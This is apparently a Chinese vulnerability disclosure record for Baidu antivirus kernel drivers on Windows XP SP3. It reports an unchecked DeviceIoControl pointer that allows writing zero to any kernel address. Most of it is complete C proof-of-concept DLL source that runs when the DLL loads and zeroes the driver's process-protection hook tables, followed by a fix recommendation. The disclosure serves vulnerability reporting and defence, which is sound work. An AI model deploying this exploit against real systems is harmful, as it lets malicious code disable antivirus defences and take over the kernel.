2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-23: 细节向核心白帽子及相关领域专家公开
2015-06-02: 细节向普通白帽子公开
2015-06-12: 细节向实习白帽子公开
2015-06-27: 细节向公众公开
BDArKit.sys对DeviceIoControl处理的参数检查不严格,可以造成任意地址写入漏洞

1. 版本
BDArKit.sys 2.0.13.34
bd0001.sys 2.0.1.11
系统: windows xp sp3

2. 说明
利用该漏洞,可以对任意内核地址写入0x00000000。比如将bd0001.sys内部记录的SSDT hook分发函数表置为空,从而解除全部防御。也可以对其余内核模块进行修改实现用户态对内核态的完全控制。
漏洞触发之前:
漏洞触发之后:
// Proof-of-concept attached to the disclosure: a DLL that, when loaded, opens
// the BDArKit control device and issues the IOCTL whose "output buffer" pointer
// the driver uses as a kernel write target. Kept as the vulnerability record;
// the fix belongs in the driver (probe/validate every user-supplied pointer).

// Resolve the load address of a kernel module whose (lower-cased) image name
// contains pName.
//   pName  - substring to look for, e.g. "bd0001.sys"; NULL matches nothing.
//   return - module base as a DWORD, or 0 if ZwQuerySystemInformation cannot
//            be resolved, the query fails, or no module matches.
// NOTE(review): the result is truncated to 32 bits ((DWORD)Base). The target
// stated in the write-up is 32-bit Windows XP SP3, where this is lossless.
DWORD GetDriverBase(CHAR* pName)
{
    // One entry of the SystemModuleInformation (class 11) result; the buffer
    // begins with a ULONG entry count followed by this array.
    // NOTE(review): field widths assume 32-bit pointers - not valid on x64.
    typedef struct _SYSTEM_MODULE_INFORMATION
    {
        ULONG Reserved[2];
        PVOID Base;
        ULONG Size;
        ULONG Flags;
        USHORT Index;
        USHORT Unknown;
        USHORT LoadCount;
        USHORT ModuleNameOffset;
        CHAR ImageName[256];
    } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

    typedef LONG (WINAPI* FN_ZwQuerySystemInformation)(ULONG, PVOID, ULONG, PULONG);

    // Resolved at run time from ntdll; no import library is used.
    FN_ZwQuerySystemInformation fn = (FN_ZwQuerySystemInformation)GetProcAddress(GetModuleHandle(_T("ntdll")), "ZwQuerySystemInformation");
    if(!fn) return 0;

    DWORD dwBase = 0;
    // Fixed 64 KiB buffer. If the module list does not fit, the call returns a
    // non-zero status, the loop below is skipped and 0 is returned; cb is not
    // used to retry with a larger buffer.
    CHAR* pBuffer = new CHAR[0x10000];
    memset(pBuffer, 0, 0x10000);
    ULONG cb = 0;
    LONG l = (*fn)(11, pBuffer, 0x10000, &cb);
    if(0 == l)
    {
        ULONG count = *((ULONG*)pBuffer);
        PSYSTEM_MODULE_INFORMATION pInfo = (PSYSTEM_MODULE_INFORMATION)(pBuffer + sizeof(ULONG));
        for (ULONG i = 0; i < count; ++i)
        {
            if('\0' != pInfo[i].ImageName[0])
            {
                // Lower-cased in place so the comparison is case-insensitive;
                // ImageName is matched as a substring (it may hold a path).
                strlwr(pInfo[i].ImageName);
                if(pName && strstr(pInfo[i].ImageName, pName))
                {
                    dwBase = (DWORD)pInfo[i].Base;
                    break;
                }
            }
        }
    }
    // NOTE(review): allocated with new[] but released with delete rather than
    // delete[] - undefined behaviour in C++; should be delete[] pBuffer.
    delete pBuffer;
    return dwBase;
}

// Issue the vulnerable IOCTL twice. The 5th DeviceIoControl argument
// (lpOutBuffer) is not used as an output buffer: it is the kernel address the
// driver writes to (0x00000000 per the write-up), so each call clears one hook
// dispatch-table entry inside bd0001.sys. The two offsets are specific to
// bd0001.sys 2.0.1.11 as given in the write-up.
//   hDev - open handle to the BDArKit device (see FuzzDriver).
// Control code 0x222028: by the CTL_CODE bit layout its method bits are 0
// (METHOD_BUFFERED) and its access bits are 0 (FILE_ANY_ACCESS), which is why a
// handle opened with only GENERIC_READ suffices. With METHOD_BUFFERED and an
// output length of 0 the I/O manager does not touch lpOutBuffer, so the driver
// presumably dereferences Irp->UserBuffer directly without ProbeForWrite -
// confirm against the driver; that missing validation is the defect the
// advisory asks the vendor to fix.
// NOTE(review): both DeviceIoControl return values are ignored; the write-up
// verifies the effect out of band (presumably the before/after screenshots).
void CallDriver(HANDLE hDev)
{
    DWORD bd0001Base = GetDriverBase("bd0001.sys");
    if(!bd0001Base) return;

    DWORD code = 0x222028;
    char inputBuff[0x1000] = { 0 };
    DWORD inputLen = 0xfc4;
    DWORD dwReturned = 0;
    // Input payload: two DWORDs at the start of the buffer. Their meaning to
    // the driver is not explained anywhere in the write-up.
    DWORD a[] = {0x0000000a,0xfc4};
    for(DWORD i = 0; i < sizeof(a)/sizeof(*a); ++i)
    {
        *((DWORD*)(inputBuff + 4*i)) = a[i];
    }

    DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen,
                    (LPVOID)(bd0001Base + 0x14e80), // NtTerminateProcess hook dispatch table
                    0, &dwReturned, NULL);
    DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen,
                    (LPVOID)(bd0001Base + 0x132a8), // NtOpenProcess hook dispatch table
                    0, &dwReturned, NULL);
}

// Open the BDArKit control device and run the PoC against it. Despite the
// name this does no fuzzing: it performs exactly the two writes in CallDriver.
// Only GENERIC_READ is requested; because the IOCTL carries FILE_ANY_ACCESS
// the I/O manager requires no write access on the handle, so any caller able
// to open the device at all reaches the handler. Who can open it depends on
// the device object's security descriptor, which is not shown here. A failed
// open (driver not loaded, no such device) is silently ignored.
void FuzzDriver()
{
    LPCTSTR DevName = _T("\\\\.\\BDArKit");
    HANDLE hDev = CreateFile(DevName, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(INVALID_HANDLE_VALUE != hDev)
    {
        CallDriver(hDev);
        CloseHandle(hDev);
    }
}

// DLL entry point: runs the PoC on every call, regardless of
// ul_reason_for_call (attach, detach and thread notifications alike).
// NOTE(review): device I/O from DllMain executes under the loader lock;
// tolerable for a throwaway PoC, not for anything else.
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    FuzzDriver();
    return TRUE;
}
加强IRP_MJ_DEVICE_CONTROL处理函数的逻辑检查,对参数做有效性校验。例如:对用户态传入的缓冲区指针(如Irp->UserBuffer),写入前必须在__try/__except中用ProbeForWrite校验地址范围和对齐,不能直接解引用。
危害等级:无影响厂商忽略
忽略时间:2015-06-27 15:37
暂无